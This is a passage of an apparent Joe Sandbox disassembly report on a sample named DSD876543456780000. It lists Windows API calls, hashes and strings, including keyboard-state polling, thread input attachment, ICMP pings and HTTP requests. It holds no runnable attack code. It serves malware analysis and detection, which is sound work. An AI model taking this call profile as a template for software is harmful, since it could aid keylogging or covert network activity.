                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C8559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C855AC
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: 2b1da14d91337fbc2f645e65144b074dafc41ee44389d745e6cd192524efeee7
                                        • Instruction ID: f4a4afe890a845f5dba133f5da5e7887178ad97783a298cf69971d649b8f4c5b
                                        • Opcode Fuzzy Hash: 2b1da14d91337fbc2f645e65144b074dafc41ee44389d745e6cd192524efeee7
                                        • Instruction Fuzzy Hash: 3F61AE74900608EFDF10AF95CC84EFE7BB9EF09329F104155F925A72A0D7B49A81DB68
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C4FAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00C4FB08
                                        • VariantInit.OLEAUT32(?), ref: 00C4FB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C4FB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 00C4FB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C4FBA1
                                        • VariantClear.OLEAUT32(?), ref: 00C4FBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00C4FBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C4FBCC
                                        • VariantClear.OLEAUT32(?), ref: 00C4FBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C4FBE9
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 191749970d27c24476be0c49723f77c9a81618a368c3833ffda9f6589b547688
                                        • Instruction ID: 4d445729915d06ec2ca806eb6de89eb1d208914ca19f5c7697b5913b2a0454d0
                                        • Opcode Fuzzy Hash: 191749970d27c24476be0c49723f77c9a81618a368c3833ffda9f6589b547688
                                        • Instruction Fuzzy Hash: 23414275A00219DFCB04DF64DC98EBEBBB9FF48344F008069E955A7261C730A986CFA0
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00C59CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C59D22
                                        • GetKeyState.USER32(000000A0), ref: 00C59D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C59D57
                                        • GetKeyState.USER32(000000A1), ref: 00C59D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00C59D84
                                        • GetKeyState.USER32(00000011), ref: 00C59D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 00C59DAE
                                        • GetKeyState.USER32(00000012), ref: 00C59DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C59DD8
                                        • GetKeyState.USER32(0000005B), ref: 00C59DEA
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 2ac581a34b300d351e16407793a9385bea4ac917c22e7683045d765e5ef55d52
                                        • Instruction ID: 250bffad8adba6948933f5208e6a5f59d16a49d632f41c782d77385b72c9eeb8
                                        • Opcode Fuzzy Hash: 2ac581a34b300d351e16407793a9385bea4ac917c22e7683045d765e5ef55d52
                                        • Instruction Fuzzy Hash: 8741C7385047C9A9FF31866488443A5BEB0EB11345F0480DADED6565C2E7B5ABCCC7AA
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00C705BC
                                        • inet_addr.WSOCK32(?), ref: 00C7061C
                                        • gethostbyname.WSOCK32(?), ref: 00C70628
                                        • IcmpCreateFile.IPHLPAPI ref: 00C70636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C706C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C706E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00C707B9
                                        • WSACleanup.WSOCK32 ref: 00C707BF
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 82e2a5e3dbd900337d87bbd93459ee02e92aafd9cd28ee94ff998dfba9cd79f6
                                        • Instruction ID: e64d8d582c239195d1345dffebf707a6785797e3bdd51571b9ea94351663e437
                                        • Opcode Fuzzy Hash: 82e2a5e3dbd900337d87bbd93459ee02e92aafd9cd28ee94ff998dfba9cd79f6
                                        • Instruction Fuzzy Hash: 97916C35604201DFD724DF15C899F1ABBE4AF44318F24C5A9F5698B6A2C730ED85CF91
                                        APIs
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: 49d263d48d1493131371cb37c18df5956265fd3905e9c0751641fc18ef3eaca1
                                        • Instruction ID: 7612eba72d6cf11cd37408812b0cbb7ff39b7b7920f9a73c3281e84be8e2f0bb
                                        • Opcode Fuzzy Hash: 49d263d48d1493131371cb37c18df5956265fd3905e9c0751641fc18ef3eaca1
                                        • Instruction Fuzzy Hash: 1051D435A401169BCF24DF68C8459BEB7A5BF65760B208229EA29E72C0DB30DE48C790
                                        APIs
                                        • CoInitialize.OLE32 ref: 00C73774
                                        • CoUninitialize.OLE32 ref: 00C7377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00C8FB78,?), ref: 00C737D9
                                        • IIDFromString.OLE32(?,?), ref: 00C7384C
                                        • VariantInit.OLEAUT32(?), ref: 00C738E4
                                        • VariantClear.OLEAUT32(?), ref: 00C73936
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 6951af25de7be06b2139fb480bb7e69a63b6c813c4e93210afc1cfc4989abbbb
                                        • Instruction ID: 503d5b4603d770bb3181eb5b316e31d5cc7afae1cba321e1329d23c6da9fbbc4
                                        • Opcode Fuzzy Hash: 6951af25de7be06b2139fb480bb7e69a63b6c813c4e93210afc1cfc4989abbbb
                                        • Instruction Fuzzy Hash: 0161B170608341AFD310DF54C889F6AB7E8EF89710F10895AF9999B291C770EE48DB97
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C633CF
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C633F0
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: b2ad512e38e14a5bb35b96e1763d81ce3b1650280aa9656ed5dbc1eb67b97099
                                        • Instruction ID: 8916331e300be8109fbf0763db4badaff899db076c6b0baa0aaa2c92db48b322
                                        • Opcode Fuzzy Hash: b2ad512e38e14a5bb35b96e1763d81ce3b1650280aa9656ed5dbc1eb67b97099
                                        • Instruction Fuzzy Hash: D1517F71900259AADF15EBA0CD82EFEB7B8EF04740F1440A5F605730A2EB356F98DB64
                                        APIs
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 32901c4ea220342a7d80aa1dc879fe0eda7ad0e734f255b56a8b3d74e2c54b39
                                        • Instruction ID: 2ea4f64a50bfa616e600ce8e7615a6bef04840e3b21e6d8146ccc23d0375daad
                                        • Opcode Fuzzy Hash: 32901c4ea220342a7d80aa1dc879fe0eda7ad0e734f255b56a8b3d74e2c54b39
                                        • Instruction Fuzzy Hash: 1341F436A000279ACB245F7DC8905BEBBA5AFA0795B244129FC31DB284EB35CEC5C790
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C653A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C65416
                                        • GetLastError.KERNEL32 ref: 00C65420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00C654A7
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 9e3cdad8c2ba08fb6721c92e4fab64c89c6ccbbeb3fba4a58721ec0329db751f
                                        • Instruction ID: 7d6972a3a68827992ebbbf60432a634ab6b4da94606f11edb6ef633f96cccb70
                                        • Opcode Fuzzy Hash: 9e3cdad8c2ba08fb6721c92e4fab64c89c6ccbbeb3fba4a58721ec0329db751f
                                        • Instruction Fuzzy Hash: 17319275A006059FCB20DF68C4C4BBE7BB4EF45305F2480A5E515CB292DB71DE86CBA0
                                        APIs
                                        • CreateMenu.USER32 ref: 00C83C79
                                        • SetMenu.USER32(?,00000000), ref: 00C83C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C83D10
                                        • IsMenu.USER32(?), ref: 00C83D24
                                        • CreatePopupMenu.USER32 ref: 00C83D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C83D5B
                                        • DrawMenuBar.USER32 ref: 00C83D63
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: 0a5aef987344ff916f6ed3dd255382bed4c0f0593f25f990e3d5846815a21887
                                        • Instruction ID: 3bd12c79ae67c823db8416f159d4218bd33a3b26de513f36c1c985c34547b1ee
                                        • Opcode Fuzzy Hash: 0a5aef987344ff916f6ed3dd255382bed4c0f0593f25f990e3d5846815a21887
                                        • Instruction Fuzzy Hash: 64418A75A01209AFDF14DF64D888FAE7BB5FF4A354F144029E91697360D730AA10DBA8
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C51F64
                                        • GetDlgCtrlID.USER32 ref: 00C51F6F
                                        • GetParent.USER32 ref: 00C51F8B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C51F8E
                                        • GetDlgCtrlID.USER32(?), ref: 00C51F97
                                        • GetParent.USER32(?), ref: 00C51FAB
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C51FAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: 1d3180c537e531e0a8eab06b90ef77f1c7b0e2c67707eb72046f595a3c5361d1
                                        • Instruction ID: 085f37cf143438bec618aeedc776b75db3f54208fab2c518f918bb439f4828f7
                                        • Opcode Fuzzy Hash: 1d3180c537e531e0a8eab06b90ef77f1c7b0e2c67707eb72046f595a3c5361d1
                                        • Instruction Fuzzy Hash: 7E21AF74900218ABCF04AFA0DC85BFEBBB8EF05350B040255FD61A7291DB35594C9B68
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C83A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C83AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C83AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C83AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C83B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C83BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C83BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C83BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C83BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C83C13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: b2902b1820abb255a79638bae6ac2637fd34a0583ba3bf3e19e30412744f957e
                                        • Instruction ID: 0ecc49fc9e0a403fabce9542248c7b1ceec07f162e8a81d2805c6c7d24f5464b
                                        • Opcode Fuzzy Hash: b2902b1820abb255a79638bae6ac2637fd34a0583ba3bf3e19e30412744f957e
                                        • Instruction Fuzzy Hash: C9619BB5900248AFDB10EFA8CC81FEE77B8EF09714F140199FA15A72A2D774AE41DB54
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00C5B151
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00C5B16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5B18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C5A1E1,?,00000001), ref: 00C5B21D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 0d449253da10fea7c0a61f0df1cfb5a2d3b5c4b2787c18f6b7fcb98ca7c3d2f4
                                        • Instruction ID: e7347f19da42c6692fb2f31a095e2f9f2f575e40ad1d5c07e83ca5debad023af
                                        • Opcode Fuzzy Hash: 0d449253da10fea7c0a61f0df1cfb5a2d3b5c4b2787c18f6b7fcb98ca7c3d2f4
                                        • Instruction Fuzzy Hash: 3B316B7A500604BFDB109F64EC88FAE7FA9BB51312F108115FE15D6190D7B89E858F78
                                        APIs
                                        • _free.LIBCMT ref: 00C22C94
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C22CA0
                                        • _free.LIBCMT ref: 00C22CAB
                                        • _free.LIBCMT ref: 00C22CB6
                                        • _free.LIBCMT ref: 00C22CC1
                                        • _free.LIBCMT ref: 00C22CCC
                                        • _free.LIBCMT ref: 00C22CD7
                                        • _free.LIBCMT ref: 00C22CE2
                                        • _free.LIBCMT ref: 00C22CED
                                        • _free.LIBCMT ref: 00C22CFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 68fbccef938b145efb4dfc6862fb7d0d181bfca09bccb30ca11dbbff987577c7
                                        • Instruction ID: eb3da70e89a38aed8dbd9e46124845c6aec154366be4cf6a3d5c5ed6b56d42e7
                                        • Opcode Fuzzy Hash: 68fbccef938b145efb4dfc6862fb7d0d181bfca09bccb30ca11dbbff987577c7
                                        • Instruction Fuzzy Hash: 16118976500218BFCB02FF54E942CDD3BA5FF09350F9145A5F9495FA22D631EE90AB90
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BF1459
                                        • OleUninitialize.OLE32(?,00000000), ref: 00BF14F8
                                        • UnregisterHotKey.USER32(?), ref: 00BF16DD
                                        • DestroyWindow.USER32(?), ref: 00C324B9
                                        • FreeLibrary.KERNEL32(?), ref: 00C3251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C3254B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: 64444d816515be7c9e26b544ab754b5136c8cfe6c893defdf2cd18c4bcc3ab08
                                        • Instruction ID: 5743100b3c31840e686a06c791d287830125e37dff5a9bf18681500694491dcd
                                        • Opcode Fuzzy Hash: 64444d816515be7c9e26b544ab754b5136c8cfe6c893defdf2cd18c4bcc3ab08
                                        • Instruction Fuzzy Hash: 09D16C31711212CFCB29EF19C895B29F7A4BF05700F1449EDE54AAB292DB30AD16CF54
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C67FAD
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C67FC1
                                        • GetFileAttributesW.KERNEL32(?), ref: 00C67FEB
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C68005
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68017
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68060
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C680B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        • Opcode ID: 6b62c5b5feda4ccd49b6df1e74001ea89232c3897b4ef265f0e89a4e6ccaaeb1
                                        • Instruction ID: 135c08b5d274cc274d9dde4209b76f2573711cda7d6fc723362c0da001f4de13
                                        • Opcode Fuzzy Hash: 6b62c5b5feda4ccd49b6df1e74001ea89232c3897b4ef265f0e89a4e6ccaaeb1
                                        • Instruction Fuzzy Hash: 4881AE725082059FCB30EF55C894AAEB3E8AF88314F144E5AF995C7250EB36DE4D8B52
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00BF5C7A
                                          • Part of subcall function 00BF5D0A: GetClientRect.USER32(?,?), ref: 00BF5D30
                                          • Part of subcall function 00BF5D0A: GetWindowRect.USER32(?,?), ref: 00BF5D71
                                          • Part of subcall function 00BF5D0A: ScreenToClient.USER32(?,?), ref: 00BF5D99
                                        • GetDC.USER32 ref: 00C346F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C34708
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C34716
                                        • SelectObject.GDI32(00000000,00000000), ref: 00C3472B
                                        • ReleaseDC.USER32(?,00000000), ref: 00C34733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C347C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 7cc2b172f65cd544b88dfbdd50bd233312676c019bc1610cfcafef7730c6d5d3
                                        • Instruction ID: 46f4552703b8a65ba79cb81b06966d81c6168f781bd7e1ea6f3717ca61129e23
                                        • Opcode Fuzzy Hash: 7cc2b172f65cd544b88dfbdd50bd233312676c019bc1610cfcafef7730c6d5d3
                                        • Instruction Fuzzy Hash: D471E231400209DFCF298F64C985ABE7BB5FF4A354F144269FE665A1A6C330A945DF60
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C635E4
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • LoadStringW.USER32(00CC2390,?,00000FFF,?), ref: 00C6360A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        • Opcode ID: d6b44fede968ffaccde32a5f903717b05601126915c39d605bb49db415edee7f
                                        • Instruction ID: 1ad7c0b4b9bbb22204bfb0bb2db999217ec35804ac78204887a254bac445f9f7
                                        • Opcode Fuzzy Hash: d6b44fede968ffaccde32a5f903717b05601126915c39d605bb49db415edee7f
                                        • Instruction Fuzzy Hash: 95516F71800259AADF15EBA0DC82EFDBBB4EF04740F0841A5F605731A2DB305B99DF64
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                          • Part of subcall function 00C0912D: GetCursorPos.USER32(?), ref: 00C09141
                                          • Part of subcall function 00C0912D: ScreenToClient.USER32(00000000,?), ref: 00C0915E
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000001), ref: 00C09183
                                          • Part of subcall function 00C0912D: GetAsyncKeyState.USER32(00000002), ref: 00C0919D
                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C88B6B
                                        • ImageList_EndDrag.COMCTL32 ref: 00C88B71
                                        • ReleaseCapture.USER32 ref: 00C88B77
                                        • SetWindowTextW.USER32(?,00000000), ref: 00C88C12
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C88C25
                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C88CFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 1924731296-2107944366
                                        • Opcode ID: dcfade3d8a34d3214d8d59737cc07d2dc63cc28d7e7f22bf638b4a486953134e
                                        • Instruction ID: a3f1338c31e911b640025a75c0e876773f2a1c27edd3d73e510541d752e9c321
                                        • Opcode Fuzzy Hash: dcfade3d8a34d3214d8d59737cc07d2dc63cc28d7e7f22bf638b4a486953134e
                                        • Instruction Fuzzy Hash: D051AA70104204AFD704EF24DC96FAE77E4FB88754F40062DF996972E2CB70AA08CB66
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6C272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6C29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6C2CA
                                        • GetLastError.KERNEL32 ref: 00C6C322
